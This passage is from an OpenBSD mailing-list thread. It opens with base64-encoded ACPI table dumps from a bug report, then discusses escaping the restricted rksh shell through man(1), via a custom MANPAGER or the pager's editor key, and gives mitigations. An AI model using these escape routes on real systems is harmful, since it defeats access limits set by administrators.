IyAOGHkACFBSU0IRCQoGIyAOGHkACFBSU0MRCQoGIyAOGHkACFBSU0QRCQoGIyAOGHkAW4JKiFBD
STAIX0hJRAxB0AoDFAtfQURSAKRIQkNBCF9CQk4ACF9VSUQAFEsHX1BSVACgPZOQUElDTVVJT0EA
REJHXw1SRVRVUk5JTkcgUElDCgBwAF4uU0JSR0FQREVwAF4uU0JSR0FQQUSkUFIwMKE1REJHXw1S
RVRVUk5JTkcgQVBJQwoAcAq+Xi5TQlJHQVBERXAK714uU0JSR0FQQUSkUFIwMVuCT0JTQlJHFAtf
QURSAKRJT0NBW4BQQ0lDAgAK/1uBFlBDSUMBAEhWQVBBRAgAQBhBUERFCFuCSQdeUENJRQhfSElE
DEHQDAIIX1VJRAoRCENSU18REQoOhgkAAAAAANwAAAAEeQAUM19DUlMAikNSU18KBEJBUzGKQ1JT
XwoITEVOMXBQQ0lCQkFTMXBQQ0lMTEVOMaRDUlNfFBVfU1RBAKAJk1BDSUIApAChBKQKDluCN1BT
MksIX0hJRAxB0AMDFAlfU1RBAKQKDwhfQ1JTERgKFUcBYABgAAABRwFkAGQAAAEiAgB5AFuCNURN
QUMIX0hJRAxB0AIACF9DUlMRIAodRwEAAAAAARBHAYAAgAABEEcBwADAAAEgKhAFeQBbgk4FRkRD
MAhfSElEDEHQBwAUC19TVEEApFVGREMIX0NSUxEbChhHAfAD8AMBBkcB9wP3AwEBIkAAKgQAeQAI
X1BSUxEbChhHAfAD8AMBBkcB9wP3AwEBIkAAKgQAeQBbgidQUzJNCF9ISUQMQdAPAxQJX1NUQQCk
Cg8IX0NSUxEICgUiABB5AFuCN0xQVF8IX0hJRAxB0AQAFAlfU1RBAKQKDwhfQ1JTERgKFUcBeAN4
AwgIRwF4B3gHCAgigAB5AFuCTQheU1JMMAhfSElEDEHQBQEIX1VJRAEUFV9TVEEAoAmTU0wwQgCk
AKEEpAoPCENSU18REAoNRwH4A/gDAQgiEAB5ABRJBF9DUlMAi0NSU18KAk1JTjCLQ1JTXwoETUFY
MItDUlNfCglJUlEwcFNMMEJNSU4wcFNMMEJNQVgweQFTTDBJSVJRMKRDUlNfW4JOCF5TUkwxCF9I
SUQMQdAFAQhfVUlECgIUFV9TVEEAoAmTU0wxQgCkAKEEpAoPCENSU18REAoNRwH4AvgCAQgiCAB5
ABRJBF9DUlMAi0NSU18KAk1JTjGLQ1JTXwoETUFYMYtDUlNfCglJUlExcFNMMUJNSU4xcFNMMUJN
QVgxeQFTTDFJSVJRMaRDUlNfW4IqVElNUghfSElEDEHQAQAIX0NSUxEVChJHAUAAQAAABEcBUABQ
ABAEeQBbgitQSUNfCF9ISUQLQdAIX0NSUxEYChVHASAAIAAAAkcBoACgAAACIgQAeQBbgi5SVENf
CF9ISUQMQdALAAhfQ1JTEQ0KCkcBcABwAAECeQAUC19TVEEApFVSVENbgkUFSFBFVAhfSElEDEHQ
AQMIX0NJRAxB0AwBCF9VSUQAFAtfU1RBAKRVSFBUCENSU18RFwoUIgEAIgABhgkAAQAA0P4ABAAA
eQAUC19DUlMApENSU19bgk0EU01DXwhfSElEDAYQAAEIX0NJRA1zbWMtbmFwYQAUC19TVEEApFVT
TUMIQ1JTXxEQCg1HAQADAAMBICJAAHkAFAtfQ1JTAKRDUlNfW4I6R0lHRQhfSElEDEHQg5AUC19B
RFIApE5JQ0EUCEVXT0wBpAAUFV9TVEEAoAmTTklDQQCkAKEEpAoPW4JJBUdGWDAIX0FEUgwAAAIA
EB9cX0dQRRQYX0wwMgCGXC8DX1NCX1BDSTBHRlgwCoEUBl9ET1MBFA9fRE9EAKQSBwEMAAEAgFuC
EFZHQV8UCl9BRFIIpAsAAVuCRwlIREVGFE4GX0RTTQRwEisEDWxheW91dC1pZAARBwoEBAAAAA1Q
aW5Db25maWd1cmF0aW9ucwARAgBgoDCTaBETChDGt7WgGBMcRLDJ/mler5SboBiTaQGgDJNqAHAR
AwEDYKRgoAaTagGkYHARAwEAYKRgFAtfQURSAKRIREFBFBVfU1RBAKAJk0hEQUEApAChBKQKD1uC
TSNCQVQwCF9ISUQMQdAMCghfVUlEABAfXF9HUEUUGF9MMDAAhlwvA19TQl9QQ0kwQkFUMAqBW4BD
QkFUAQtAQAoIW4EQQ0JBVANJRFgwIERBVDAgW4ZGBUlEWDBEQVQwA1NUQVQgUFJBVCBSQ0FQIFBW
T0wgVU5JVCBEQ0FQIExGQ1AgQlRFQyBEVk9MIERXUk4gRExPVyBHUk4xIEdSTjIgQlNUQSBBUFNS
IBQLX1NUQQCkQlNUQQhQQklGEioNAQz///9/DP///38A/wAACgQKBA0xAA0wAA1WQk9YAA1pbm5v
dGVrAAhQQlNUEhIEAAz///9/DP///38M////fxROD19CSUYAcFVOSVSIUEJJRgAAcERDQVCIUEJJ
RgEAcExGQ1CIUEJJRgoCAHBCVEVDiFBCSUYKAwBwRFZPTIhQQklGCgQAcERXUk6IUEJJRgoFAHBE
TE9XiFBCSUYKBgBwR1JOMYhQQklGCgcAcEdSTjKIUEJJRgoIAERCR18NX0JJRjoKAEhFWDSDiFBC
SUYAAEhFWDSDiFBCSUYBAEhFWDSDiFBCSUYKAgBIRVg0g4hQQklGCgMASEVYNIOIUEJJRgoEAEhF
WDSDiFBCSUYKBQBIRVg0g4hQQklGCgYASEVYNIOIUEJJRgoHAEhFWDSDiFBCSUYKCACkUEJJRhQ9
X0JTVABwU1RBVIhQQlNUAABwUFJBVIhQQlNUAQBwUkNBUIhQQlNUCgIAcFBWT0yIUEJTVAoDAKRQ
QlNUW4JEBEFDX18IX0hJRA1BQ1BJMDAwMwAIX1VJRAAIX1BDTBIGAV9TQl8UEl9QU1IApF5eLkJB
VDBBUFNSFAlfU1RBAKQKDxBOC19TQl8QRwtQQ0kwCENSU18RQgcKbogNAAIMAAAAAAD/AAAAAAFH
AfgM+AwBCIgNAAEMAwAAAAD3DAAA+AyIDQABDAMAAAAN//8AAADzhxcAAAwDAAAAAAAACgD//wsA
AAAAAAAAAgCHFwAADAMAAAAAAAAAAP//3/8AAAAAAADg/3kAFDhfQ1JTAIpDUlNfClxSQU1UikNS
U18KaFJBTVJwTUVNTFJBTVR0DAAA4P9SQU1UUkFNUqRDUlNfEEouX1NCX1uBJy8DUENJMFNCUkdQ
Q0lDAQBAMFBJUkEIUElSQghQSVJDCFBJUkQICEJVRkERCQoGIwCAGHkAi0JVRkEBSUNSUxQWTFNU
QQF7aAqAYKAFYKQKCaEEpAoLFBdMQ1JTAXtoCg9geQFgSUNSU6RCVUZBFBZMU1JTAYtoAUlTUlOC
SVNSU2CkdmAUDExESVMBpH1oCoAAW4JBDExOS0EIX0hJRAxB0AwPCF9VSUQBFB9fU1RBAERCR18N
TE5LQS5fU1RBCgCkTFNUQVBJUkEUG19QUlMAREJHXw1MTktBLl9QUlMKAKRQUlNBFCNfRElTAERC
R18NTE5LQS5fRElTCgBwTERJU1BJUkFQSVJBFB9fQ1JTAERCR18NTE5LQS5fQ1JTCgCkTENSU1BJ
UkEUKl9TUlMBREJHXw1MTktBLl9TUlM6IABIRVhfTFNSU2hwTFNSU2hQSVJBW4JCCExOS0IIX0hJ
RAxB0AwPCF9VSUQKAhQPX1NUQQCkTFNUQVBJUkIUC19QUlMApFBSU0IUE19ESVMAcExESVNQSVJC
UElSQhQPX0NSUwCkTENSU1BJUkIUKl9TUlMBREJHXw1MTktCLl9TUlM6IABIRVhfTFNSU2hwTFNS
U2hQSVJCW4JCCExOS0MIX0hJRAxB0AwPCF9VSUQKAxQPX1NUQQCkTFNUQVBJUkMUC19QUlMApFBS
U0MUE19ESVMAcExESVNQSVJDUElSQxQPX0NSUwCkTENSU1BJUkMUKl9TUlMBREJHXw1MTktDLl9T
UlM6IABIRVhfTFNSU2hwTFNSU2hQSVJDW4JCCExOS0QIX0hJRAxB0AwPCF9VSUQKBBQPX1NUQQCk
TFNUQVBJUkQUC19QUlMApFBSU0QUE19ESVMAcExESVNQSVJBUElSRBQPX0NSUwCkTENSU1BJUkQU
Kl9TUlMBREJHXw1MTktELl9TUlM6IABIRVhfTFNSU2hwTFNSU2hQSVJECF9TMF8SBAIAAKATe1BX
UlMKAgAIX1MxXxIEAgEBoBV7UFdSUwoQAAhfUzRfEgYCCgUKBQhfUzVfEgYCCgUKBRQjX1BUUwFE
QkdfDVByZXBhcmUgdG8gc2xlZXA6IABIRVhfaA==
====
begin-base64 644 openbsd.FACP.1
RkFDUHQAAAAE81ZCT1ggIFZCT1hGQUNQAQAAAEFTTCBhAAAAAAL/H3AE/x8BAAkALkQAAKGgAAAA
QAAAAAAAAARAAAAAAAAAAAAAAAhAAAAgQAAAAAAAAAQCAAQCAAAAZQDpAwAAAAAAAAAAAAMAAEEF
AAA=
====
begin-base64 644 openbsd.RSDT.0
UlNEVDAAAAABh1ZCT1ggIFZCT1hSU0RUAQAAAEFTTCBhAAAAcAD/H0AC/x+gAv8f
====
begin-base64 644 openbsd.SSDT.4
U1NEVMwBAAABq1ZCT1ggIFZCT1hDUFVUAgAAAElOVEwVBRUgEEcaXF9QUl9bgwtDUFUwAAAAAAAA
o6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Oj
o6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Oj
o6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Oj
o6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Oj
o6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Oj
o6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Oj
o6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Oj
o6Ojow==
====
begin-base64 644 openbsd.headers
ClJTRCBQVFI6IENoZWNrc3VtPTY2LCBPRU1JRD1WQk9YLCBSc2R0QWRkcmVzcz0weDFmZmYwMDAw
CgoKUlNEVDogTGVuZ3RoPTQ4LCBSZXZpc2lvbj0xLCBDaGVja3N1bT0xMzUsCglPRU1JRD1WQk9Y
LCBPRU0gVGFibGUgSUQ9VkJPWFJTRFQsIE9FTSBSZXZpc2lvbj0weDEsCglDcmVhdG9yIElEPUFT
TCwgQ3JlYXRvciBSZXZpc2lvbj0weDYxCgoKCUVudHJpZXM9eyAweDFmZmYwMDcwLCAweDFmZmYw
MjQwLCAweDFmZmYwMmEwIH0KCgoJRFNEVD0weDFmZmYwNDcwCglJTlRfTU9ERUw9QVBJQwoJU0NJ
X0lOVD05CglTTUlfQ01EPTB4NDQyZSwgQUNQSV9FTkFCTEU9MHhhMSwgQUNQSV9ESVNBQkxFPTB4
YTAsIFM0QklPU19SRVE9MHgwCglQTTFhX0VWVF9CTEs9MHg0MDAwLTB4NDAwMwoJUE0xYV9DTlRf
QkxLPTB4NDAwNC0weDQwMDUKCVBNMl9UTVJfQkxLPTB4NDAwOC0weDQwMGIKCVBNMl9HUEUwX0JM
Sz0weDQwMjAtMHg0MDIxCglQX0xWTDJfTEFUPTEwMW1zLCBQX0xWTDNfTEFUPTEwMDFtcwoJRkxV
U0hfU0laRT0wLCBGTFVTSF9TVFJJREU9MAoJRFVUWV9PRkZTRVQ9MCwgRFVUWV9XSURUSD0wCglE
QVlfQUxSTT0wLCBNT05fQUxSTT0wLCBDRU5UVVJZPTAKCUZsYWdzPXtXQklOVkQsRklYX1JUQyxU
TVJfVkFMX0VYVH0KCgpEU0RUOiBMZW5ndGg9NzE1MywgUmV2aXNpb249MSwgQ2hlY2tzdW09MTM0
LAoJT0VNSUQ9VkJPWCwgT0VNIFRhYmxlIElEPVZCT1hCSU9TLCBPRU0gUmV2aXNpb249MHgyLAoJ
Q3JlYXRvciBJRD1JTlRMLCBDcmVhdG9yIFJldmlzaW9uPTB4MjAxNTA1MTUKCgpBUElDOiBMZW5n
dGg9ODQsIFJldmlzaW9uPTIsIENoZWNrc3VtPTk5LAoJT0VNSUQ9VkJPWCwgT0VNIFRhYmxlIElE
PVZCT1hBUElDLCBPRU0gUmV2aXNpb249MHgxLAoJQ3JlYXRvciBJRD1BU0wsIENyZWF0b3IgUmV2
aXNpb249MHg2MQoKClNTRFQ6IExlbmd0aD00NjAsIFJldmlzaW9uPTEsIENoZWNrc3VtPTE3MSwK
CU9FTUlEPVZCT1gsIE9FTSBUYWJsZSBJRD1WQk9YQ1BVVCwgT0VNIFJldmlzaW9uPTB4MiwKCUNy
ZWF0b3IgSUQ9SU5UTCwgQ3JlYXRvciBSZXZpc2lvbj0weDIwMTUwNTE1Cgo=
====

Reply | Threaded
Open this post in threaded view
|

Re: your mail

Stuart Henderson-6
On 2016/02/05 10:19, [hidden email] wrote:

> >Synopsis: escape rksh when user has access to man(1)
> >Category: system
> >Environment:
> System      : OpenBSD 5.8
> Details     : OpenBSD 5.8 (GENERIC) #1170: Sun Aug 16 02:26:00 MDT 2015
> [hidden email]:/usr/src/sys/arch/amd64/compile/GENERIC
>
> Architecture: OpenBSD.amd64
> Machine     : amd64
> >Description:
> user can escape rksh shell when he has access to man(1) using custom MANPAGER env variable

I don't think this is a bug. You are expecting more of rksh than
it offers.

You don't even need a custom MANPAGER, the default pager will allow
'v' to run $EDITOR which will also usually allow dropping to a shell.

> # ll /home/whoo/bin/
> total 872
> drwxr-xr-x  2 root  whoo     512 Feb  5 10:10 .
> drwxr-xr-x  4 whoo  whoo     512 Feb  5 00:06 ..
> -r-xr-xr-x  1 root  bin   422520 Aug 16 10:19 man
> #
>
> man copied from /usr/bin/
..
> >Fix:

Don't allow access to programs which allow the user to escape to
an unrestricted shell?

If you need man, maybe run it from a wrapper that enforces environment
variables (MANPAGER, LESSSECURE), or uses 'man -c'.

Reply | Threaded
Open this post in threaded view
|

Re: your mail

martin i
>> the default pager will allow  'v' to run $EDITOR which will also usually
allow dropping to a shell.

True, but rksh catches that:

!/bin/csh
sh: /bin/rksh: restricted

This one it doesn't.

I don't personally use restricted shells; I found this issue on brocade
switches, where admin user should have limited access.
I then tried it on OpenBSD and FreeBSD, with slight modification it was
possible.

I get that restricted shells are not being taken that seriously, I just
wanted to inform that there's this way to do it.
Apologies if it should not be in the bugs section.

martin


On Fri, Feb 5, 2016 at 11:40 AM, Stuart Henderson <[hidden email]> wrote:

> On 2016/02/05 10:19, [hidden email] wrote:
> > >Synopsis:    escape rksh when user has access to man(1)
> > >Category:    system
> > >Environment:
> >       System      : OpenBSD 5.8
> >       Details     : OpenBSD 5.8 (GENERIC) #1170: Sun Aug 16 02:26:00 MDT
> 2015
> >                        [hidden email]:
> /usr/src/sys/arch/amd64/compile/GENERIC
> >
> >       Architecture: OpenBSD.amd64
> >       Machine     : amd64
> > >Description:
> >       user can escape rksh shell when he has access to man(1) using
> custom MANPAGER env variable
>
> I don't think this is a bug. You are expecting more of rksh than
> it offers.
>
> You don't even need a custom MANPAGER, the default pager will allow
> 'v' to run $EDITOR which will also usually allow dropping to a shell.
>
> > # ll /home/whoo/bin/
> > total 872
> > drwxr-xr-x  2 root  whoo     512 Feb  5 10:10 .
> > drwxr-xr-x  4 whoo  whoo     512 Feb  5 00:06 ..
> > -r-xr-xr-x  1 root  bin   422520 Aug 16 10:19 man
> > #
> >
> > man copied from /usr/bin/
> ..
> > >Fix:
>
> Don't allow access to programs which allow the user to escape to
> an unrestricted shell?
>
> If you need man, maybe run it from a wrapper that enforces environment
> variables (MANPAGER, LESSSECURE), or uses 'man -c'.
>



--

*There is only one God, and his name is Death. And there is only one thing
we say to Death: ‘Not today’*
                                     --- Syrio Forel, Game of Thrones ---